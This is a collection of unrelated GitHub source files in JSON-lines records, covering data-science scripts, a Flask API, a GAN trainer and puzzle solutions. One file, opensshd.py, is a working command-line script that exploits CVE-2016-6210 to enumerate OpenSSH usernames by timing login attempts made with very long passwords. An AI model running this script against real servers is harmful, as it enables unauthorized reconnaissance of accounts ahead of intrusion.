usePickle:\n createColocationMap(featureMap)\n\n with open(distancePickle, 'wb') as pickleHandle:\n pickle.dump(colocationMap[2], pickleHandle)\n\n colocationMinerAlgo(prevIndexThres)\n print('Colocated Features: {}'.format(coLocations))\n print('Colocation Rules: {}'.format(colocationRules))\n\n print('Total time Taken {}'.format(time()-mainStart))\n\n if qgisFiles:\n createQGISFiles()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shanbhag10/Crime-Predictor-Chicago","sub_path":"scripts/colocationAlgo.py","file_name":"colocationAlgo.py","file_ext":"py","file_size_in_byte":15823,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"4172220615","text":"\n# a = [1,1,1,2,2,2,3,3]\n\n# a = list(set(a))\n# print(a)\n#homework\n#1\n# a_list = [1,5,7,4]\n# print(f'sorted():{sorted(a_list)}')\n# print(f'.sort(): {a_list.sort()}')\n\n# a = [1, 2, 3, 4, 5]\n# b = a\n# a[2] = 5\n# print(a)\n# print(b)\n\n# def duplicated_letters(a_string):\n\n# new_list = list()\n# for i in a_string:\n# if a_string.count(i) > 1:\n# if i in new_list:\n# continue\n# else:\n# new_list.append(i)\n \n# return new_list\n# print(duplicated_letters('apple'))\n# print(duplicated_letters('banana'))\n\n\n# def low_and_up(a):\n# pass\n# new_string = ''\n# for i in range(len(a)):\n# if i % 2==0:\n# new_string += a[i].lower()\n# else:\n# new_string += a[i].upper()\n# return new_string\n\n# print(low_and_up('apple'))\n# print(low_and_up('banana'))\n\n# def lonely(a_list):\n \n# cnt =1\n# while True:\n# #print(f'{a_list[cnt]} == {a_list[cnt-1]}')\n# if cnt == len(a_list)-1:\n \n# if a_list[cnt] == a_list[cnt-1]:\n \n# a_list.pop(cnt-1)\n# break\n \n# elif a_list[cnt] == a_list[cnt-1]:\n# a_list.remove(a_list[cnt])\n \n# cnt =1\n# else : \n# cnt +=1\n \n \n# return a_list\n\n# print(lonely([1, 1, 3, 3, 0, 1, 1])) # => [1, 3, 0, 1]\n# print(lonely([4, 4, 4, 3, 3])) # => [4, 3]\n\ndef my_find(text, alphabet):\n ind = list()\n while True:\n if len(ind) == 0 and text.find(alphabet)==-1:\n return -1\n elif text.find(alphabet) != -1:\n ind.append(text.find(alphabet))\n text = text.strip(alphabet)\n elif text.find(alphabet)==-1:\n break\n return ind\n \nprint(my_find('apple', 'p'))\nprint(my_find('a', 
'p'))","repo_name":"Dohyun-Kimm/TIL","sub_path":"Python/06_python_workshop.py","file_name":"06_python_workshop.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74792905088","text":"from flask import Blueprint, jsonify, request\nfrom starter_app.models import User, Shopping_List, db, Ingredient, Ing_Shop, Food_Group\nfrom sqlalchemy.orm import joinedload\nfrom datetime import datetime\n\nlist_routes = Blueprint('lists', __name__)\n\n@list_routes.route('/', methods=[\"GET\"])\ndef index(user_id):\n response = Shopping_List.query.filter(Shopping_List.user_id == user_id).all()\n return { \"user_lists\": [shopping_list.to_dict() for shopping_list in response]}\n\n@list_routes.route('/new', methods=[\"POST\"])\ndef new_list():\n data = request.get_json()\n new_shop_list = Shopping_List(name=data[\"name\"], \n user_id=data[\"user_id\"], \n date=datetime.now())\n db.session.add(new_shop_list)\n db.session.commit()\n new_shop_list = new_shop_list.to_dict()\n return jsonify(new_shop_list)\n \n\n@list_routes.route('/delete/', methods=[\"DELETE\"])\ndef delete_list(list_id):\n list_items = Ing_Shop.query.filter(Ing_Shop.list_id == list_id).all()\n for item in list_items:\n db.session.delete(item)\n list_to_delete = Shopping_List.query.filter(Shopping_List.id == list_id).one()\n db.session.delete(list_to_delete)\n db.session.commit()\n return jsonify('deleted')\n \n\n@list_routes.route('/items/', methods=[\"GET\"])\ndef get_list_items(list_id):\n user_list = Shopping_List.query.filter(Shopping_List.id == list_id).one()\n user_list = user_list.to_dict()\n items = Ing_Shop.query.join(Ingredient, Ing_Shop.ingredient_id == Ingredient.id).add_columns(\n Ingredient.name).add_columns(\n Ingredient.expires_in).add_columns(\n Ingredient.id).options(\n joinedload(Ing_Shop.ingredients)).filter(\n Ing_Shop.list_id == list_id)\n list_items = [{\"id\":item.id, \"expires_in\":expires_in, \"name\":name, \"ingredient_id\": id} for (item, name, expires_in, id) in items]\n return jsonify({\"items\":list_items, \"user_list\":user_list})\n\n\n@list_routes.route('/add', methods=[\"POST\"])\ndef add_list_items():\n data = request.get_json()\n try:\n exists = Ing_Shop.query.filter(\n Ing_Shop.ingredient_id == data[\"itemToAdd\"]).filter(\n Ing_Shop.list_id == data[\"listId\"]).one()\n except:\n new_item = Ing_Shop(list_id=data[\"listId\"], ingredient_id=data[\"itemToAdd\"])\n db.session.add(new_item)\n db.session.commit()\n new_item = new_item.to_dict()\n return jsonify(new_item)\n return jsonify('already exists')\n\n\n@list_routes.route('/search_bar_add', methods=[\"POST\"])\ndef add_search_list_items():\n data = request.get_json()\n poss_ingredient = Ingredient.query.filter(Ingredient.name.ilike(data[\"itemToAdd\"])).one()\n try:\n exists = Ing_Shop.query.filter(\n Ing_Shop.ingredient_id == poss_ingredient.id).filter(\n Ing_Shop.list_id == data[\"listId\"]).one()\n except:\n new_item = Ing_Shop(list_id=data[\"listId\"], ingredient_id=poss_ingredient.id)\n db.session.add(new_item)\n db.session.commit()\n new_item = new_item.to_dict()\n return jsonify(new_item)\n return jsonify('already exists')\n \n\n@list_routes.route('/remove-item', methods=[\"POST\"])\ndef remove_list_items():\n data = request.get_json()\n item_to_remove = Ing_Shop.query.filter(\n Ing_Shop.ingredient_id == data[\"ingredient_id\"]).filter(\n Ing_Shop.list_id == data[\"listId\"]).one() \n db.session.delete(item_to_remove)\n db.session.commit()\n return 
jsonify('item removed')\n\n\n@list_routes.route('/ingredients', methods=[\"GET\"])\ndef get_ingredients():\n groups = Food_Group.query.all()\n group_list = [item.to_dict() for item in groups]\n items = Ingredient.query.all()\n items_list = [item.to_dict() for item in items]\n return jsonify({\"ingredients\":items_list, \"food_groups\": group_list})\n\n\n@list_routes.route('/groups/', methods=[\"GET\"])\ndef get_ingredients_by_group(group_id):\n items = Ingredient.query.filter(Ingredient.food_group_id == group_id).order_by(Ingredient.name).all()\n items_list = [item.to_dict() for item in items]\n return jsonify(items_list)","repo_name":"jarondegen/whatsinthesauce","sub_path":"starter_app/api/list_routes.py","file_name":"list_routes.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15564120359","text":"\r\nimport paramiko\r\nimport time\r\nimport argparse\r\nimport logging\r\n\r\nfrom multiprocessing import Pool\r\n\r\nlogging.basicConfig()\r\n\r\n\r\nclass Engine(object):\r\n file_path = None\r\n target = ''\r\n userlist = ['root']\r\n calc_times = []\r\n\r\n req_time = 0.0\r\n num_pools = 10\r\n\r\n def __init__(self, target, filepath=None, req_time=0.0):\r\n self.req_time = req_time\r\n self.target = target\r\n self.file_path = filepath\r\n if self.file_path:\r\n self.load_users(filepath)\r\n\r\n def load_users(self, filepath):\r\n data = []\r\n with open(filepath, 'r') as f:\r\n data = f.read().splitlines()\r\n self.userlist = data\r\n\r\n def partition_list(self, p_list):\r\n p_size = len(p_list) / self.num_pools\r\n for i in xrange(0, len(p_list), p_size):\r\n yield p_list[i:i+p_size]\r\n\r\n def execute(self):\r\n\r\n for user in self.userlist:\r\n self.test_with_user(user)\r\n\r\n def test_with_user(self, user):\r\n p = 'A' * 25000\r\n ssh = paramiko.SSHClient()\r\n start_time = time.clock()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n end_time = time.clock()\r\n try:\r\n ssh.connect(self.target, username=user, password=p)\r\n except:\r\n end_time = time.clock()\r\n total = end_time - start_time\r\n self.calc_times.append(total)\r\n avg = reduce(lambda x, y: x + y, self.calc_times) / len(self.calc_times)\r\n flag = '*' if total > avg else ''\r\n print('%s:\\t\\t%s\\t%s' % (user, total, flag))\r\n time.sleep(self.req_time)\r\n ssh.close()\r\n\r\n\r\ndef main(ip_addr, filename=None, req_time=0.0):\r\n if ip_addr == '' or not ip_addr:\r\n print('No target IP specified')\r\n return\r\n if filename == '':\r\n filepname = None\r\n engine = Engine(target=ip_addr, filepath=filename, req_time=req_time)\r\n engine.execute()\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description='Simple automated script for CVE 2016-6210 -- OpenSSHD 7.2p2 >= version')\r\n parser.add_argument('ip', help='[Required] The IP of the target server')\r\n parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line')\r\n parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)')\r\n\r\n ip_addr = None\r\n filename = None\r\n req_time = 0.0\r\n args = parser.parse_args()\r\n\r\n if args.ip:\r\n ip_addr = args.ip\r\n if args.userlist:\r\n filename = args.userlist\r\n if args.time:\r\n req_time = float(args.time)\r\n main(ip_addr, filename, 
req_time)\r\n\r\n\r\n","repo_name":"calebshortt/opensshd_user_enumeration","sub_path":"opensshd.py","file_name":"opensshd.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"6806255167","text":"import tensorflow as tf\nimport cv2\nimport numpy as np\n\n\nclass FaceDetection(object):\n \"\"\"Face Detection to detect the face in an image.\"\"\"\n\n def __init__(self,model_path):\n self._interpreter = tf.contrib.lite.Interpreter(model_path=model_path)\n self._interpreter.allocate_tensors()\n self.input_details = self._interpreter.get_input_details()\n self.output_details = self._interpreter.get_output_details()\n self.input_shape = self.input_details[0]['shape']\n\n def __str__(self):\n return 'Face Detection handler:\\n\\\n input: {}\\n\\\n output: {}'.format(self.input_details, self.output_details)\n\n def __call__(self,\n image):\n \"\"\"Detecting face for an gray image\n\n Args:\n image: numpy array with shape (image_height, image_width)\n\n Returns:\n prob: probability of the return box\n sx: start x\n sy: start y\n ex: end x\n ey: end y\n\n Raises:\n ValueError: if dimension of the iamge is not 2\n \"\"\"\n if len(image.shape) != 2:\n raise ValueError('dimension of the iamge must 2')\n\n org_height, org_width = image.shape\n input_data = cv2.resize(image, (self.input_shape[2], self.input_shape[1]))\n input_data = np.reshape(input_data, (1, self.input_shape[2], self.input_shape[1], 1))\n input_data = input_data.astype(np.float32)\n # input_data = input_data/255.0\n # fill data and inference\n self._interpreter.set_tensor(self.input_details[0]['index'], input_data)\n self._interpreter.invoke()\n\n # get output data\n output_boxes = self._interpreter.get_tensor(self.output_details[0]['index'])\n # ll = self._interpreter.get_tensor(self.output_details[1]['index'])\n # output_classes = self._interpreter.get_tensor(self.output_details[1]['index'])\n # output_scores = self._interpreter.get_tensor(self.output_details[2]['index'])\n # output_nums = self._interpreter.get_tensor(self.output_details[3]['index'])\n #\n # prob = output_scores[0][0]\n # box = output_boxes[0][0]\n #\n # sy = int(org_height * box[0])\n # sx = int(org_width * box[1])\n # ey = int(org_height * box[2])\n # ex = int(org_width * box[3])\n\n return output_boxes\n\ntflite_path = \"tf.tflite\"\nfd = FaceDetection(tflite_path)\nprint(fd)\n# Read image from path\nimage_path = \"test.jpg\"\nimage= cv2.imread(image_path,0)\nimage = image/255.0\n# print(image)\n# image_rgb = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)\n# image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2GRAY)\n\n\n# Predict and get output\noutput_boxes = fd(image)\nprint(output_boxes)\n# print(score,sx,sy,ex,ey)\n#\n# cv2.rectangle(image_rgb, (sx,sy), (ex,ey), (255,0,0), 5)","repo_name":"panguxiaoshen/tiny_yolov3","sub_path":"tensorflow/src/test_tflite.py","file_name":"test_tflite.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"43"} +{"seq_id":"10488297582","text":"import matplotlib as mpl\nimport pprint\nfrom cycler import cycler #color cycler\nimport itertools\n\n#All colors\ncolors = {u\"gcred\" : u\"#BE1818\",\n u\"gcorange\" : u\"#FF9900\",\n u\"gclime\" : u\"#9DCE09\",\n u\"gcgreen\" : u\"#488F38\",\n u\"gcdarkgrey\" : u\"#808080\",\n u\"gcgrey\" : u\"#C0C0C0\",\n u\"gclightgrey\" : u\"#E6E6E6\",\n u\"gcsilver\" : u\"#EFF2F9\",\n u\"gcdarkblue\" : u\"#00006E\",\n 
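The `FaceDetection` handler above follows the standard TFLite set-tensor/invoke/get-tensor cycle; here is a minimal sketch of the same cycle against the current `tf.lite.Interpreter` entry point (the record uses the older `tf.contrib.lite` namespace). The model path is a placeholder, not a file from the record.

import numpy as np
import tensorflow as tf  # assumes a TF build that ships tf.lite

# "model.tflite" is a hypothetical path.
interpreter = tf.lite.Interpreter(model_path="model.tflite")
interpreter.allocate_tensors()
inp = interpreter.get_input_details()[0]
out = interpreter.get_output_details()[0]

# Feed a dummy tensor of the expected shape/dtype, run, read the result back.
dummy = np.zeros(inp['shape'], dtype=inp['dtype'])
interpreter.set_tensor(inp['index'], dummy)
interpreter.invoke()
result = interpreter.get_tensor(out['index'])
print(result.shape)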
u\"gcblue\" : u\"#000099\",\n u\"gcgreyblue\" : u\"#1C3363\",\n u\"gccyan\" : u\"#009999\",\n u\"gcgreycyan\" : u\"#BBE0E3\",\n u\"gcmagenta\" : u\"#9467bd\",\n u\"gcbrown\" : u\"#8c564b\"}\n\n#Colorcycle\ncolorcycle = [\"gcblue\", \"gcred\", \"gcgreen\", \"gcorange\", \"gccyan\",\n \"gcmagenta\", \"gcbrown\", \"gcdarkgrey\"]\nlscycle = ['-', '--', '-.', ':']\nmarkercycle = ['x', '*', 'v', '^']\n\ndef make_colorcycler(iterator=False):\n if iterator:\n return itertools.cycle(colorcycle)\n\n return cycler(color=colorcycle)\n\n\n#Patch matplotlib color palette\nif int(mpl.__version__[0]) < 2:\n mpl.colors.cnames.update(colors)\nelse:\n mpl.colors._colors_full_map.update(colors)\n\n#Update default color palette\n_orig_propcycle = mpl.rcParams[\"axes.prop_cycle\"]\ndef patch_propcycle():\n cycle = (cycler(ls=lscycle)+cycler(marker=markercycle))*cycler(color=colorcycle)\n mpl.rcParams[\"axes.prop_cycle\"] = cycle\npatch_propcycle()\n\n#Restore original colorcycle\ndef restore_propcycle():\n mpl.rcParams[\"axes.prop_cycle\"] = _orig_propcycle\n\n\ndef show_colors():\n #Function to print the GC colors\n pprint.pprint(colors)\n","repo_name":"burneyy/danplotlib","sub_path":"danplotlib/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"75223800770","text":"import os\nimport sys\nimport socket\nimport argparse\n\nargparser = argparse.ArgumentParser()\nargparser.add_argument('--tcp_port', help='The TCP port to check', type=int, required=True)\nargs = argparser.parse_args()\n\nexit_status = 0\ntry:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #If we are in WSL, SO_REUSEADDR will not work correctly, allowing to rebind on an unavailable port\n if \"Microsoft\" not in os.uname().release:\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('0.0.0.0', args.tcp_port))\n sock.listen()\nexcept:\n exit_status = -1\nfinally:\n sock.close()\n\nsys.exit(exit_status)\n","repo_name":"data-team-uhn/cards","sub_path":"Utilities/HostConfig/check_tcp_available.py","file_name":"check_tcp_available.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"11938272139","text":"import cifar10\nimport time\n\nfrom ops import *\nfrom skimage.io import imsave\nfrom datetime import timedelta\n\n\nbatch_size = 64\n\n\n\n\ndef read_images():\n cifar10.maybe_download_and_extract()\n images_train, cls_train, labels_train = cifar10.load_training_data()\n\n return images_train\n\n\n\ndef train_gan():\n\n # initializer dataset\n images_train = read_images()\n\n\n # create placehodler variables, number of latent variable for generator is 100\n x_data = tf.placeholder(tf.float32, [None, 32, 32, 3], name='real_data')\n x_random= tf.placeholder(tf.float32, [None, 100], name='random_init')\n is_train = tf.placeholder(tf.bool, name='is_train')\n\n\n # define generator and discriminator\n gen = generator(x_random, is_train=is_train)\n with tf.variable_scope('d_d') as scope:\n d_fake = discriminator(inputs=gen, is_train=is_train)\n scope.reuse_variables()\n d_real = discriminator(inputs=x_data, is_train=is_train)\n\n\n # loss function\n loss_g = loss_function(d_fake, tf.ones_like(d_fake))\n loss_d = loss_function(d_fake, tf.zeros_like(d_fake)) + \\\n loss_function(d_real, tf.ones_like(d_real))\n\n # add summary\n tf.summary.scalar('loss_d', loss_d)\n tf.summary.scalar('loss_g', 
loss_g)\n\n # retrieve variables\n var_g = [item for item in tf.trainable_variables() if item.name.startswith('g')]\n var_d = [item for item in tf.trainable_variables() if item.name.startswith('d')]\n\n # define optimizer function\n optimizer_d = tf.train.AdamOptimizer(learning_rate=2e-4, beta1=0.5).minimize(loss_d, var_list=var_d)\n optimizer_g = tf.train.AdamOptimizer(learning_rate=2e-4, beta1=0.5).minimize(loss_g, var_list=var_g)\n\n # define session\n session = tf.Session()\n session.run(tf.global_variables_initializer())\n\n # add to tensorboard\n writer = tf.summary.FileWriter('Tensorboard')\n writer.add_graph(session.graph)\n merge = tf.summary.merge_all()\n\n t1 = time.time()\n\n # begin training\n for i in range(20001):\n\n # train discriminator\n x = random_batch(images_train, batch_size)\n x_rand = generate_random_samples([batch_size, 100])\n\n for j in range(1):\n session.run(optimizer_d, feed_dict={x_data:x, x_random:x_rand, is_train:True})\n\n # train generator\n for j in range(1):\n session.run(optimizer_g, feed_dict={x_random:x_rand, is_train:True})\n\n # write to tensorboard\n result = session.run(merge, feed_dict={x_data:x, x_random:x_rand, is_train:False})\n writer.add_summary(result, i)\n\n if i%1000 == 0:\n current_loss_d = session.run(loss_d, feed_dict={x_data:x, x_random:x_rand, is_train:False})\n current_loss_g = session.run(loss_g, feed_dict={x_random:x_rand, is_train:False})\n g_images = session.run(gen, feed_dict={x_random:x_rand, is_train:False})\n print('No.{} iteration'.format(i))\n print('Current loss for discriminator: {}'.format(current_loss_d))\n print('Current loss for generator: {}'.format(current_loss_g))\n deprocess_and_save(g_images, i)\n t2 = time.time()\n time_dif = t2 - t1\n print('Time usage: {}...'.format(timedelta(seconds=int(time_dif))))\n print()\n\n\n\n\n# main function for training\ntrain_gan()\n","repo_name":"junming259/DCGANs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35880415385","text":"#!/usr/bin/env python3\nimport itertools\ntext = [int(line) for line in input().split(',')]\ndef intcode(text, inq):\n outq = []\n pc = 0\n def fetch(addr, mode):\n if mode == 0:\n return text[addr]\n elif mode == 1:\n return addr\n else:\n raise ValueError(f'unknown mode {mode}')\n while True:\n op = text[pc]%100\n amode = text[pc]//100%10\n bmode = text[pc]//1000%10\n cmode = text[pc]//10000%10\n if op == 1:\n text[text[pc+3]] = fetch(text[pc+1], amode) + fetch(text[pc+2], bmode)\n pc += 4\n elif op == 2:\n text[text[pc+3]] = fetch(text[pc+1], amode) * fetch(text[pc+2], bmode)\n pc += 4\n elif op == 3:\n text[text[pc+1]] = inq.pop(0)\n pc += 2\n elif op == 4:\n outq.append(fetch(text[pc+1], amode))\n pc += 2\n elif op == 5:\n pc = fetch(text[pc+2], bmode) if fetch(text[pc+1], amode) != 0 else pc+3\n elif op == 6:\n pc = fetch(text[pc+2], bmode) if fetch(text[pc+1], amode) == 0 else pc+3\n elif op == 7:\n text[text[pc+3]] = int(fetch(text[pc+1], amode) < fetch(text[pc+2], bmode))\n pc += 4\n elif op == 8:\n text[text[pc+3]] = int(fetch(text[pc+1], amode) == fetch(text[pc+2], bmode))\n pc += 4\n elif op == 99:\n break\n else:\n raise ValueError(f'unknown op {op} at {pc}')\n return outq\nres = 0\nfor a, b, c, d, e in itertools.permutations(range(5)):\n q = intcode(text.copy(), [a, 0])\n q = intcode(text.copy(), [b, q[0]])\n q = intcode(text.copy(), [c, q[0]])\n q = intcode(text.copy(), [d, q[0]])\n q = 
intcode(text.copy(), [e, q[0]])\n res = max(res, q[0])\nprint(res)\n","repo_name":"DankRank/aoc","sub_path":"2019/07/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39940077219","text":"import numpy as np\n\n# Input\nA = np.array([[1, 1, 0],\n [3, -1, 2],\n [2, -1, 3]])\n\nx = np.array([1, 0, 0])\nx_plus1 = x\nk=0\nlam = np.nan\n\nwhile np.linalg.norm(x_plus1 - x, 2) > 1e-4 or k == 0:\n x = x_plus1\n k = k+1\n x_plus1 = (A@x)/np.linalg.norm(A@x, 2)\n lam = (x.T@A@x)/(x.T@x)\n\n print(f\"Iterations: {k}\")\n print(f\"Lambda: {lam}\")\n print(f\"x: {x_plus1}\")\n\n#eig comparison\neigVal, eigVec = np.linalg.eig(A)\nmax_value = np.argmax(eigVal)\nprint(\"\\n\")\nprint(\"Max Eigenvalue: \")\nprint(eigVal[max_value])\nprint(\"\\n\")\nprint(\"Corresponding Eigenvector: \")\nprint(eigVec[:,max_value])\nprint(\"\\n\")","repo_name":"jaypi95/ZHAW_Archive","sub_path":"HM1/peterju1_S12_Aufg5.py","file_name":"peterju1_S12_Aufg5.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6737052142","text":"import socket\r\nimport sys\r\n\r\ndef main():\r\n arguments = sys.argv\r\n if len(arguments) != 2:\r\n print(f\"Uso: python clienteUDP.py \")\r\n exit(1)\r\n\r\n host = arguments[1]\r\n port_udp = 5001\r\n\r\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\n while True:\r\n destinatario = input(\"Ingrese el nombre del destinatario (o 'exit' para salir): \")\r\n if destinatario.lower() == 'exit':\r\n break\r\n\r\n message = input(\"Ingrese un mensaje: \")\r\n client_socket.sendto(f\"{destinatario}:{message}\".encode('utf-8'), (host, port_udp))\r\n\r\n # Esperar la respuesta del servidor\r\n try:\r\n response, server_address = client_socket.recvfrom(1024)\r\n print(f\"Respuesta del servidor UDP: {response.decode('utf-8')}\")\r\n except ConnectionResetError:\r\n print(\"Error: La conexión con el servidor UDP fue cerrada de forma inesperada.\")\r\n\r\n # Cerrar la conexión UDP\r\n client_socket.close()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"eliasDomHer/Actividad_10_Sistemas_Operativos","sub_path":"clienteUDP.py","file_name":"clienteUDP.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22018040990","text":"# Script to convert tcl scripts to python format\nimport os\n\ndef tclToPython(tclfile, pyfile, runname):\n tclfile = os.path.abspath(tclfile)\n\n pyfilePath = pyfile.split('/')\n pyfileDir = '/'.join(pyfilePath[:-1])\n os.chdir(f'/{pyfileDir}')\n\n pyfile = pyfilePath[-1]\n\n runstr = str(runname) + '.'\n with open(tclfile, 'r') as fin:\n with open(pyfile, 'w') as fout:\n lines = fin.readlines()\n prevLine = ''\n for line in lines:\n newline = line\n if 'lappend auto_path $env(PARFLOW_DIR)/bin' in newline:\n newline = 'from parflow import Run\\n'\n\n if 'package require parflow' in newline:\n newline = ''\n\n if 'namespace import Parflow::*' in newline:\n newline = f'{runname} = Run(\"{runname}\", __file__)\\n'\n\n if newline[0:6] == 'pfset ':\n newline = newline.replace('pfset ', runstr)\n newline_subs = newline.split()\n newline_subs[0] = newline_subs[0].replace('-', '_')\n if newline_subs[1][0].isalpha() or newline_subs[1][0] == \"\\\"\":\n newline = newline_subs[0] + ' = ' + \"'\" + ' '.join(newline_subs[1:]) + \"'\" 
+ '\\n'\n newline = newline.replace('-', '_').replace('\\\"', '').replace(\"'False'\", \"False\").replace(\"'True'\", \"True\")\n elif newline_subs[1][0] == '$' and len(newline_subs) == 2:\n newline = newline_subs[0] + ' = ' + newline_subs[1][1:] + '\\n'\n else:\n newline = newline_subs[0] + ' = ' + ' '.join(newline_subs[1:]) + '\\n'\n\n if newline[0:4] == 'set ' and 'runname' not in newline:\n newline = newline.replace('set ', '')\n newline_subs = newline.split()\n if newline_subs[1][0].isalpha():\n newline = newline_subs[0] + ' = ' + \"'\" + ' '.join(newline_subs[1:]) + \"'\" + '\\n'\n else:\n newline = newline_subs[0] + ' = ' + ' '.join(newline_subs[1:]) + '\\n'\n\n # commenting out all lines of code that haven't been edited yet\n if newline[0:1] != '#' and newline[0:1] != '\\n' and newline == line:\n # testing for lines that continue to the next line\n if len(prevLine) >= 2 and prevLine[-2] == \"\\\\\":\n pass\n else:\n newline = '# ' + newline\n\n prevLine = newline\n\n fout.write(newline)\n\n fout.write(f'{runname}.run()\\n')\n\n return\n\n# directory = '/Users/grapp/kw-intern/parflow/tcl_original'\n#\n# for file_name in os.listdir(directory):\n# if file_name.endswith(\".tcl\"):\n# full_name = os.path.join(directory, file_name)\n# tclToPython(full_name, f'Users/grapp/kw-intern/parflow/python/test/raw_converted/{file_name[:-4]}.py', f'{file_name[:-4]}')\n\n\n# tclToPython('/Users/grapp/kw-intern/parflow/tcl_original/richards_box_proctest_vardz.tcl', f'Users/grapp/kw-intern/parflow/python/test/raw_converted/richards_box_proctest_vardz.py', 'richards_box_proctest_vardz')","repo_name":"grapp1/kw-intern","sub_path":"parflow/helper_scripts/tclToPython.py","file_name":"tclToPython.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"70125739009","text":"import pygame\n\nWIDTH, HEIGHT = 700, 700 #pixels #width and hight of window\nROWS, COLS = 8, 8 #number of colmns and rows\nSQUARE_SIZE = WIDTH//COLS #size of the square\n\n #RGB\nRED = (255, 0, 0)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nBLUE = (0, 0, 255)\nGREY = (128,128,128)\n\nCROWN = pygame.transform.scale(pygame.image.load('images/king.png'), (40, 25)) #load image of crown and resize","repo_name":"ramii3mad/Checkers-Player-Game","sub_path":"checkers/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"32222878791","text":"#input_file = open('input_day5.txt', 'r').readlines()\n\n#slice - visar värden i input_file från element 0 - 8. input_file.index(osv.) för in 9 som slice siffra, \\n är på index 9. \n# vill ej ha med den raden, därav -1. \"Står input_file[0:8]\"\n#crate_lines = input_file[:input_file.index('\\n')-1] \n\n#slice - ta ut att det är 9 kolumner. \n#[:input_file.index('\\n')] tar ut alla värden i kolumn sektionen. 
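To make the `pfset` rewriting rule in `tclToPython` above concrete, a tiny sketch of the same transformation applied to one sample line; the run name and key are invented for illustration.

# Hypothetical ParFlow .tcl input line and run name.
line = 'pfset Process.Topology.P 2\n'
runname = 'demo'

subs = line.replace('pfset ', runname + '.').split()
value = ' '.join(subs[1:])
# Mirror the branch in tclToPython: quote alphabetic values, leave numbers bare.
if value[0].isalpha() or value[0] == '"':
    converted = subs[0] + " = '" + value + "'"
else:
    converted = subs[0] + ' = ' + value
print(converted)  # demo.Process.Topology.P = 2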
Utifrån det urvalet [-1] för att ta ut sista raden (visar 1-9) [-3] för att ta ut 9an som\n#som är 3dje sista värdet\n#number_of_crates = input_file[:input_file.index('\\n')][-1][-3] \n\n#moving_lines = input_file[input_file.index('\\n')+1:]\n\n#for line in moving_lines:\n# amount, source, target = [int(entry) for entry in line.strip().split(' ') if entry.isdigit()]\n\n####### FROM YOUTUBE SOLUTION #####################\n# === source: https://www.youtube.com/watch?v=LvH2DU1bARk ====\n\nwith open('input_day5.txt') as input_file:\n stack_strings, instructions = (i.splitlines() for i in input_file.read().strip('\\n').split('\\n\\n'))\n\n\nstacks = {int(digit):[] for digit in stack_strings[-1].replace(' ', '')} #creates a dicitionary, which contains a list per stack value (1-9)\nindexes = [index for index, values in enumerate(stack_strings[-1])if values != ' ']\n\n\ndef displayStacks():\n for stack in stacks:\n print(stack, stacks[stack])\n\ndef loadStacks():\n for string in stack_strings[:-1]:\n stack_num = 1\n for index in indexes:\n if string[index] != ' ':\n stacks[stack_num].insert(0,string[index])\n stack_num += 1\n\ndef getStackEnds():\n final_string = ''\n for stack in stacks:\n final_string += stacks[stack][-1]\n print(final_string)\n\n\ndef emptyStack():\n for value in stacks:\n stacks[value] = []\n \n\n\n# ==== PART 1 ====\nloadStacks()\n\nfor instruction in instructions:\n moves, source, target = [int(entry) for entry in instruction.strip().split(' ') if entry.isdigit()]\n\n for move in range(moves):\n crate_removed = stacks[source].pop()\n stacks[target].append(crate_removed)\n\n\n#displayStacks()\ngetStackEnds() \n\n # ===== PART 2 =====\n\nemptyStack()\nloadStacks()\n\nfor instruction in instructions:\n moves, source, target = [int(entry) for entry in instruction.strip().split(' ') if entry.isdigit()]\n\n crates_to_remove = stacks[source][-moves:] # finding out which crates to move\n stacks[source] = stacks[source][:-moves] # removing crates\n\n for crate in crates_to_remove:\n stacks[target].append(crate) # adding crates to different stack\n\ndisplayStacks()\ngetStackEnds() \n\n\n","repo_name":"mallindvall/adventofcode2022","sub_path":"AdvC_05.py","file_name":"AdvC_05.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} 